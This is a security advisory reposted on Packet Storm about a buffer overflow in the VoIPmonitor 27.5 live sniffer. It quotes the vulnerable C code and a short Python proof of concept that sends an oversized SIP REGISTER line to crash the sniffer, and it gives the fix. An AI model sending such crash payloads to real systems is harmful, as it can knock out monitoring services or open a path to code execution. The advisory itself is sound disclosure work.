what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VoIPmonitor 27.6 Buffer Overflow

VoIPmonitor 27.6 Buffer Overflow
Posted Mar 15, 2021
Authored by Sandro Gauci | Site enablesecurity.com

A buffer overflow was identified in the VoIPmonitor live sniffer feature. The description variable in the function save_packet_sql is defined as a fixed length array of 1024 characters. The description is set to the value of a SIP request or response line. By setting a long request or response line VoIPmonitor will trigger a buffer overflow.

tags | exploit, overflow
SHA-256 | 145c87a11821afdce38f061bdde93705011a5071747335b1d316604f3d48c582

VoIPmonitor 27.6 Buffer Overflow

Change Mirror Download
# VoIPmonitor is vulnerable to a buffer overflow when using the live sniffer

- Fixed versions: 27.6
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-03-voipmonitor-livesniffer-buffer-overflow
- VoIPmonitor Security Advisory: none, changelog references fixes at https://www.voipmonitor.org/changelog-sniffer
- Tested vulnerable versions: 27.5
- Timeline:
- Report date: 2021-02-10
- Triaged: 2021-02-12
- Fix provided for testing: 2021-02-15
- VoIPmonitor release with fix: 2021-02-15
- Enable Security advisory: 2021-03-15

## Description

A buffer overflow was identified in the VoIPmonitor live sniffer feature. The description variable in the function `save_packet_sql` is defined as a fixed length array of 1024 characters. The description is set to the value of a SIP request or response line. By setting a long request or response line VoIPmonitor will trigger a buffer overflow. The affected code is:

```c
char callidstr[1024] = "";
if(packetS->sipDataLen) {
void *memptr = memmem(packetS->data_()+ packetS->sipDataOffset,
packetS->sipDataLen, "\r\n", 2);
if(memptr) {
memcpy(description, packetS->data_()+ packetS->sipDataOffset,
(char *)memptr - (char*)(packetS->data_()+ packetS->sipDataOffset));
description[(char*)memptr - (char*)(packetS->data_()+
packetS->sipDataOffset)] = '\0';
printf("%s\n", description);
}
// ...
}
```

## Impact

When using the static binaries provided at the VoIPMonitor download site, this vulnerability may lead to remote code execution. This is due to lack of standard memory corruption protection as explained in a separate advisory, ES2021-04-voipmonitor-staticbuild-memory-corruption-protection.

When compiling the `voipmonitor` program from source, most modern build systems will automatically include run-time best practice checks. In such cases, it appears that the worst-case-scenario is that the program will end up crashing.

## How to reproduce the issue

1. Start the live sniffer from the VOIPMonitor GUI
2. Execute the following Python program so that VOIPMonitor is able to capture the packet
3. Observe that VOIPMonitor has crashed

```python
import socket
msg='REGISTER %s SIP/2.0\r\n' % ('a' * 1024)
msg+='Via: SIP/2.0/UDP 192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n'
msg+='Max-Forwards: 70\r\n'
msg+='From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+='To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg+='Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+='CSeq: 1 REGISTER\r\n'
msg+='Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg+='Expires: 60\r\n'
msg+='Content-Length: 0\r\n'
msg+='\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(msg.encode(), ('demo.sipvicious.pro', 5060))
```

## Solution and recommendations

To address this issue, we recommend upgrading to the latest fixed version of VoIPmonitor.

We recommended the following to the vendor:

> The length of the value that the description is being set to should be checked before it is copied into memory. The pattern `memcpy(dest, src, MIN(src_len, max_len));` could be used to safely perform this operation.

## Acknowledgements

Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very quick response and fixing this security issue.

## About Enable Security

Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.


--

Sandro Gauci, CEO at Enable Security GmbH

Register of Companies: AG Charlottenburg HRB 173016 B
Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany
PGP/Encrypted comms: https://keybase.io/sandrogauci
Our blog: https://www.rtcsec.com
Other points of contact: https://enablesecurity.com/#contact-us

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close